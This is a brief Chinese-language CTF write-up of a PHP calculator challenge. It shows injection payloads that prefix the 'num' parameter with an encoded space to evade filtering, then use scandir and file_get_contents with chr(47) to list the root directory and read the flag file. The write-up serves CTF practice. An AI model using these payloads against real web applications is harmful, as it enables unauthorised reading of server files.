进入靶机查看源码,发现calc.php
进去后发现注入点
注入点show_source(),在php执行时会把空格去掉,所以我们的payload
%20num=var_dump(scandir(chr(47)));
%20空格符url编码
var_dump()——该函数用于打印显示,一个变量的内容与结构,以及类型的信息。
scandir ()——列出指定路径中的文件和目录
chr(47)——/ 根目录
我们可以发现f1agg,查看f1agg
paylooad
%20num=var_dump(file_get_contents(chr(47).f1agg))
file_get_contents()——将整个文件读入一个字符串